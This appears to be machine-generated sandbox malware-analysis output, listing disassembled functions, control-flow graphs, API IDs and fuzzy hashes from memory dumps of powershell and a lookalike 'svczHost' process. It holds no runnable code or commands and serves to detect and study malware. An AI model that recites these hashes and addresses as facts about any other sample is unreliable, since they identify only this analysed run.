                                                                                        • Snapshot File: hcaresult_11_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 7dc9ecc9586b9d2eb8b29badc15742301ec50b4713bea49a106ec0282d9db817
                                                                                        • Instruction ID: a1dfd030252be68d693d1a4847ce6de2a0ee87e5c7b1c759f51d5c75eefe628a
                                                                                        • Opcode Fuzzy Hash: 7dc9ecc9586b9d2eb8b29badc15742301ec50b4713bea49a106ec0282d9db817
                                                                                        • Instruction Fuzzy Hash: 7931D07190CB5C8FDB19DB98C849BE9BBE0FB66321F04822BD049D3152DB74A806CB91
                                                                                        Function 00007FFA83BCE083 Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 202 7ffa83bce083-7ffa83bce6ef 205 7ffa83bce6f9-7ffa83bce72b LoadLibraryExW 202->205 206 7ffa83bce6f1-7ffa83bce6f6 202->206 207 7ffa83bce733-7ffa83bce75a 205->207 208 7ffa83bce72d 205->208 206->205 208->207
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3898891623.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 262506899957b1436fcb670ff107a30b83e52592a5138617902adc814ebae799
                                                                                        • Instruction ID: 87cf38302d974722266f7805f4da7ff33ad01e310aa60b1a45cf5b1574543ddb
                                                                                        • Opcode Fuzzy Hash: 262506899957b1436fcb670ff107a30b83e52592a5138617902adc814ebae799
                                                                                        • Instruction Fuzzy Hash: F9219171908A1C9FDB58DF58C849BE9BBE1FB66321F04822FD04ED3651DB70A8468B91
                                                                                        Function 00007FFA83C92432 Relevance: .4, Instructions: 385COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 240 7ffa83c92432-7ffa83c92440 241 7ffa83c925f6-7ffa83c92600 240->241 242 7ffa83c92446-7ffa83c92449 240->242 243 7ffa83c92602-7ffa83c92612 241->243 244 7ffa83c92613-7ffa83c92662 241->244 242->241 245 7ffa83c9244f-7ffa83c92464 242->245 245->241 248 7ffa83c9246a-7ffa83c9246d 245->248 248->241 250 7ffa83c92473-7ffa83c92488 248->250 250->241 253 7ffa83c9248e-7ffa83c924b0 250->253 255 7ffa83c92665-7ffa83c92671 253->255 256 7ffa83c924b6-7ffa83c924c0 253->256 262 7ffa83c92673-7ffa83c92679 255->262 263 7ffa83c9267d 255->263 257 7ffa83c924c2-7ffa83c924d7 256->257 258 7ffa83c924d9-7ffa83c924ee 256->258 257->258 258->255 264 7ffa83c924f4-7ffa83c924fe 258->264 266 7ffa83c9267b 262->266 267 7ffa83c92681-7ffa83c926ef 262->267 263->267 268 7ffa83c9267f 263->268 269 7ffa83c92517-7ffa83c92564 264->269 270 7ffa83c92500-7ffa83c92515 264->270 266->263 275 7ffa83c926f5-7ffa83c9270a 267->275 276 7ffa83c92771-7ffa83c9277b 267->276 268->267 283 7ffa83c92568-7ffa83c92578 269->283 270->269 275->276 282 7ffa83c9270c-7ffa83c92719 275->282 278 7ffa83c92786-7ffa83c927c2 276->278 279 7ffa83c9277d-7ffa83c92785 276->279 289 7ffa83c9271b-7ffa83c92729 282->289 290 7ffa83c9272d-7ffa83c92765 282->290 286 7ffa83c9257a-7ffa83c9258b 283->286 287 7ffa83c9258c-7ffa83c925a8 283->287 286->287 302 7ffa83c925aa-7ffa83c925bb 287->302 303 7ffa83c925bc-7ffa83c925c1 287->303 295 7ffa83c92766 289->295 296 7ffa83c9272b-7ffa83c9272c 289->296 290->295 300 7ffa83c92767-7ffa83c9276e 290->300 295->300 296->290 300->276 302->303 305 7ffa83c925c3 303->305 306 7ffa83c925c5-7ffa83c925c8 303->306 305->306 306->255 307 7ffa83c925ce-7ffa83c925f5 306->307
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3901119028.00007FFA83C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ffa83c90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6dd9fa1d45291e04ff74e6cb07dc57c0eb345fdb511706d1c1dbee80986be38f
                                                                                        • Instruction ID: e664cc47348d3abfd74d51bf540c841b26dff9cdb47a3ca5276f899b8325d838
                                                                                        • Opcode Fuzzy Hash: 6dd9fa1d45291e04ff74e6cb07dc57c0eb345fdb511706d1c1dbee80986be38f
                                                                                        • Instruction Fuzzy Hash: 82B13B91A0DF8A4FE769932CD8952707BD1FF96210B0D81BAD88ED7193DE589C4AC381
                                                                                        Function 00007FFA840F1F34 Relevance: .1, Instructions: 98COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 346 7ffa840f1f34-7ffa840f1f45 348 7ffa840f1f47-7ffa840f1f50 346->348 349 7ffa840f1f65-7ffa840f1f6e 346->349 350 7ffa840f1f95-7ffa840f1f9f 348->350 351 7ffa840f1f52-7ffa840f1f55 348->351 352 7ffa840f1f87-7ffa840f1f94 349->352 353 7ffa840f1f70-7ffa840f1f7d 349->353 355 7ffa840f1fa1-7ffa840f1fad 350->355 356 7ffa840f1fae-7ffa840f1ff1 350->356 351->350 357 7ffa840f1f57-7ffa840f1f5a 351->357 353->352 358 7ffa840f1f7f-7ffa840f1f85 353->358 357->349 358->352
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3916856190.00007FFA840F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA840F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ffa840f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7560aa9a7fe7f096783b65d659970c7da8702cea739dce16e16d22ff072ca63e
                                                                                        • Instruction ID: 10f9adaf6355457e2dd5dd27eebcce4585920d02bff8d7faebede693baa45c2b
                                                                                        • Opcode Fuzzy Hash: 7560aa9a7fe7f096783b65d659970c7da8702cea739dce16e16d22ff072ca63e
                                                                                        • Instruction Fuzzy Hash: 2B21B132B0CA194FEBA4E75C54516B5B3E1EB59321F5841BBC80EC71D6DA58EC149780
                                                                                        Function 00007FFA83AAEF8A Relevance: .0, Instructions: 50COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 363 7ffa83aaef8a-7ffa83aaef96 365 7ffa83aaefbd-7ffa83aaefc4 363->365 366 7ffa83aaefc6-7ffa83aaefdf 365->366 367 7ffa83aaefeb-7ffa83aaf000 365->367 368 7ffa83aaefe3-7ffa83aaefe9 366->368 368->365
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3895347463.00007FFA83AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83AAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ffa83aad000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d87b68bb93e66fdba21bca469ae306551103ffad1b976e0eaaa9ac9ba865841e
                                                                                        • Instruction ID: 95cbf152759cbeccff08144d0c2e3cf56d39a7a1699612e8bced96d08c434e8c
                                                                                        • Opcode Fuzzy Hash: d87b68bb93e66fdba21bca469ae306551103ffad1b976e0eaaa9ac9ba865841e
                                                                                        • Instruction Fuzzy Hash: 3801A73251DF088F9668EB2DE045C6977D0FB4436071045AFD04DCB256D722F885CB81
                                                                                        Function 00007FFA83C9B30D Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3901119028.00007FFA83C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ffa83c90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d525e397747c01bfa93432dc2f40bc443be237d2c23e595706390ef824837748
                                                                                        • Instruction ID: 50ea546b7edbbc5e76d77b45b61c7c32d83c823d8cf7afb1a87480ef19cd2c7a
                                                                                        • Opcode Fuzzy Hash: d525e397747c01bfa93432dc2f40bc443be237d2c23e595706390ef824837748
                                                                                        • Instruction Fuzzy Hash: 7CF0B431A0DB048FD668D75CE4425A47BE0FF4A320B1540B6E04ED70A3DE65EC45C741
                                                                                        Function 00007FFA840F2CBD Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3916856190.00007FFA840F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA840F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ffa840f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9f3f0ab36373a593f343356e454d6e32ef3c959ca29b3dd777bc0b277f2f52a7
                                                                                        • Instruction ID: 0aa42af994d24bab494169328ddf261dc16b6150cd405f7c2d2847b31ea1b55e
                                                                                        • Opcode Fuzzy Hash: 9f3f0ab36373a593f343356e454d6e32ef3c959ca29b3dd777bc0b277f2f52a7
                                                                                        • Instruction Fuzzy Hash: 9BF0E932B0C6059FE754D718F4865FA77F1FF9712071444BAD90DC3543EA2A78568781
                                                                                        Function 00007FFA83AAEF9F Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3895347463.00007FFA83AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83AAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ffa83aad000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e0bb1dd4e0b2205f775476b915f3e934d53cda2b2d6af4d5c9ceeb8129ca1c99
                                                                                        • Instruction ID: 51850201bc24e51c1b6bc31c49b94571a986dda1e450688a9e40a316aac9e3d5
                                                                                        • Opcode Fuzzy Hash: e0bb1dd4e0b2205f775476b915f3e934d53cda2b2d6af4d5c9ceeb8129ca1c99
                                                                                        • Instruction Fuzzy Hash: 42F03A30518E08CF8BA4EF2DC485D2677E1FB98310B104958E44ECB255D774F881CB81
                                                                                        Function 00007FFA840F3FD4 Relevance: .0, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3916856190.00007FFA840F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA840F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_7ffa840f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d78e04832501d8b3241d6805c48dd58da58d7a33416683e225c7de24e5a3af85
                                                                                        • Instruction ID: b69ad9fdb04269231dc99be8ef867000fc17efc004dc50200eae6c43fb3b09a4
                                                                                        • Opcode Fuzzy Hash: d78e04832501d8b3241d6805c48dd58da58d7a33416683e225c7de24e5a3af85
                                                                                        • Instruction Fuzzy Hash: 03F0A73131CF044FD744EF1CD445661B3E0FBA9314F10462FE44EC3661DA21E4818782

                                                                                        Non-executed Functions

                                                                                        Function 00007FF780A7BFE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.4254517244.00007FF7809C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7809C0000, based on PE: true
                                                                                        • Associated: 00000013.00000002.4254454894.00007FF7809C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4256098800.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4256098800.00007FF7810C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4256098800.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4257036189.00007FF7812D5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4257074222.00007FF7812D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4257074222.00007FF7812EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4257074222.00007FF7812F2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4257074222.00007FF7812F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000013.00000002.4257234892.00007FF7812F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_7ff7809c0000_svczHost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                        • Instruction ID: 4a85ec59112a8303bed477db5e01a7c749370dcd312586549302103185ecd91c
                                                                                        • Opcode Fuzzy Hash: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                        • Instruction Fuzzy Hash: 03113326B14F0589EB00EF60E8642B873A4FB19758F940E35EE6D46794DF78E154C750

                                                                                        Executed Functions

                                                                                        Function 00007FFA83BC77A6 Relevance: .5, Instructions: 475COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.3880121560.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c15496d0dc96d8a678b1295a5f589b916a4dd41a48d2e711c1ad0638769aca73
                                                                                        • Instruction ID: ccac8530f806842454b1fc857992854cf687c591c7f3acc7632247892332f346
                                                                                        • Opcode Fuzzy Hash: c15496d0dc96d8a678b1295a5f589b916a4dd41a48d2e711c1ad0638769aca73
                                                                                        • Instruction Fuzzy Hash: 6BF18270508B4E8FEBA8EF28C85A7E977D1FF55310F04826EE84DC7291DA749945CB82
                                                                                        Function 00007FFA83BC8552 Relevance: .5, Instructions: 461COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.3880121560.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2dfbe105d974bd1f5422ca9d24a40b25914a0b6ca2840f15cac4a224475c3b19
                                                                                        • Instruction ID: fbd59c164277e46500cabacdec2aa9c1a4ccdf0b9462a78f67ec8d4f00d11909
                                                                                        • Opcode Fuzzy Hash: 2dfbe105d974bd1f5422ca9d24a40b25914a0b6ca2840f15cac4a224475c3b19
                                                                                        • Instruction Fuzzy Hash: E1E19170908E4E8FEBA8DF28C8597E977D1FF55310F04826ED84DD7291DA78A845CB82
                                                                                        Function 00007FFA83BC8166 Relevance: .3, Instructions: 334COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.3880121560.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8a22f0f64a9d6f4b36adbe5d6ed4be36e3b951542996544cf1043ba5da314e2c
                                                                                        • Instruction ID: 310ba4287362523c0392ec4475226a7a569af515a8142e012d16b4d779c72962
                                                                                        • Opcode Fuzzy Hash: 8a22f0f64a9d6f4b36adbe5d6ed4be36e3b951542996544cf1043ba5da314e2c
                                                                                        • Instruction Fuzzy Hash: A4B19670508B4D4FEB69DF28D8597E93BD1FF56310F04826EE88DC7292CA789945CB82
                                                                                        Function 00007FFA83BC7C64 Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.3880121560.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9bac44d0468756071f9139c4bc82c65bd9d798018b048689c5f4512a9d9de704
                                                                                        • Instruction ID: eb6345b1bb6ccd94bb5c9479a6740c68f549d1b027a069d1bdaf0b272aa04488
                                                                                        • Opcode Fuzzy Hash: 9bac44d0468756071f9139c4bc82c65bd9d798018b048689c5f4512a9d9de704
                                                                                        • Instruction Fuzzy Hash: 8F312FB0818B4E8EFBB4AF15CC1ABF93391FF42315F448139D48D96192CA786986CB51
                                                                                        Function 00007FFA83BC33B5 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.3880121560.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 390b43d0d27606fcc6d81820381354590e1f2259c2c4aab3fcf2d16506637991
                                                                                        • Instruction ID: 6d8e6f663ed4673805db3c9552a90535bd2efdc129d0094ca60ddf14427c7d7f
                                                                                        • Opcode Fuzzy Hash: 390b43d0d27606fcc6d81820381354590e1f2259c2c4aab3fcf2d16506637991
                                                                                        • Instruction Fuzzy Hash: 8001447111CB0C4FDB44EF0CE451AA5B7E0FB95324F54456DE58AC3651DA26E882CB46

                                                                                        Non-executed Functions

                                                                                        Function 00007FFA83BC0540 Relevance: 8.9, Strings: 7, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.3880121560.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (0$8,$H1$P/$p0$-$/
                                                                                        • API String ID: 0-1720265388
                                                                                        • Opcode ID: 4f2b4ef664a4a5161b72a2a3486ecb1c8f1326d8203173939b43a68a4f767284
                                                                                        • Instruction ID: 07e185c10348e4031fded3198bed1b648d074346602c71248f59cb85fc8c8c21
                                                                                        • Opcode Fuzzy Hash: 4f2b4ef664a4a5161b72a2a3486ecb1c8f1326d8203173939b43a68a4f767284
                                                                                        • Instruction Fuzzy Hash: D2317CC680EFC14FF36687A8685A1356E91BBA7700B1C80BBE0CC570DBD889DD46C382

                                                                                        Executed Functions

                                                                                        Function 00007FFA83BD7120 Relevance: 1.2, Instructions: 1219COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 788c181c7b6af69cd4cbd148f14f84c6b9077c890f315c74d8a36087608ac542
                                                                                        • Instruction ID: 3c07cd340267d339c199af8e3d7314f1cd31be2c4ddf89fb16da63ae938661f5
                                                                                        • Opcode Fuzzy Hash: 788c181c7b6af69cd4cbd148f14f84c6b9077c890f315c74d8a36087608ac542
                                                                                        • Instruction Fuzzy Hash: 8272C27190CB4C8FDB28DB58D8496F97BE1FF6A311F04816ED08EE7291DA706846CB91
                                                                                        Function 00007FFA83BD86F6 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 6cdc432448a81c617beadfcdb1f28d9b79536aa5b319d828b4d0be47c75a854c
                                                                                        • Instruction ID: 732f7804e21e05d41e09200b6f3ea460e8214b8c6fe84cb20d7bcf79c142cc1d
                                                                                        • Opcode Fuzzy Hash: 6cdc432448a81c617beadfcdb1f28d9b79536aa5b319d828b4d0be47c75a854c
                                                                                        • Instruction Fuzzy Hash: FD51277090DB894FD70ADB28D8595E87FE0FF57221F0842BDD48DDB192CA7AA506C341
                                                                                        Function 00007FFA83BD871F Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 717766bdebcd64376f9aea82512c35008b6123af92ac9f41f7e50b5cf8166121
                                                                                        • Instruction ID: cf91a047679705164bd9e3ab40b325098d5739419adb11fe0711b039d718ac73
                                                                                        • Opcode Fuzzy Hash: 717766bdebcd64376f9aea82512c35008b6123af92ac9f41f7e50b5cf8166121
                                                                                        • Instruction Fuzzy Hash: 67411565C0DBD94EE715C728D8996A97FE0BF03212F0C42BDC4DDAB1D2C96AA006C381
                                                                                        Function 00007FFA83BD8738 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: ad5999b3286352fa08183350878d7372d766b73fc851a549ae6ef9638a4a5949
                                                                                        • Instruction ID: a605eec2525fb53ed32fbff16e6e98980367e6645c4b4cc0a974bdbd097dd16f
                                                                                        • Opcode Fuzzy Hash: ad5999b3286352fa08183350878d7372d766b73fc851a549ae6ef9638a4a5949
                                                                                        • Instruction Fuzzy Hash: F531D364C0DB994AE759D728D8956E87FE0FF02316F18427CC4DEAB182CA7AA516C381
                                                                                        Function 00007FFA83BD8751 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 140e2159ae996ca364c0f63365194da545cdda62273119bee465e19de84d9caf
                                                                                        • Instruction ID: b611f139ae36fe85fa8d74b55ac369b9253f67e33d01a6f5b6dc29017c90795b
                                                                                        • Opcode Fuzzy Hash: 140e2159ae996ca364c0f63365194da545cdda62273119bee465e19de84d9caf
                                                                                        • Instruction Fuzzy Hash: 1221F764C0CB994AE759DB18D8856F87BE1FF12316F08437CC4DEAB1C1CA79A516C381
                                                                                        Function 00007FFA83BD84BD Relevance: .3, Instructions: 263COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d7015941936b841083d23984636119b61fef9739f4def88f4f2a7e551731ac1d
                                                                                        • Instruction ID: cb9167a3ebd5198391f83bda5d620685fcddf5d2f1ed46a9b272b02a7f33ac9e
                                                                                        • Opcode Fuzzy Hash: d7015941936b841083d23984636119b61fef9739f4def88f4f2a7e551731ac1d
                                                                                        • Instruction Fuzzy Hash: 7451286150DBC94FEB529728C8686A67FA1FF57310F0881FBE08DDB0A7DD24A805C792
                                                                                        Function 00007FFA83BD7130 Relevance: .3, Instructions: 255COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbc15ed16dd0cc009aaf7920c5b02aa4cc5da20b990b6db44fa652b738fd5072
                                                                                        • Instruction ID: de07ceb9862db8b6667571d6a6010671514d31f34226d2b261a4caa182e56900
                                                                                        • Opcode Fuzzy Hash: fbc15ed16dd0cc009aaf7920c5b02aa4cc5da20b990b6db44fa652b738fd5072
                                                                                        • Instruction Fuzzy Hash: 35719370E18A494BDB68AB68885A6F97BE1FF66310F04413ED08EE7592DE74A805C781
                                                                                        Function 00007FFA83BDAC32 Relevance: .2, Instructions: 151COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ce1ddef9f2190ec985b10a2139b1f051cbd474e2284e760a86cb99a9f59d695
                                                                                        • Instruction ID: 69d4c023986a3a7f9d0791ef06f10c1133e66ce9d0f3e3ef3773db029546803d
                                                                                        • Opcode Fuzzy Hash: 3ce1ddef9f2190ec985b10a2139b1f051cbd474e2284e760a86cb99a9f59d695
                                                                                        • Instruction Fuzzy Hash: DE418231E18E094BDF59E728C4596F9B7E1FF59300F4485BAD04EE3682DE38A9458B81
                                                                                        Function 00007FFA83BD7ED0 Relevance: .1, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
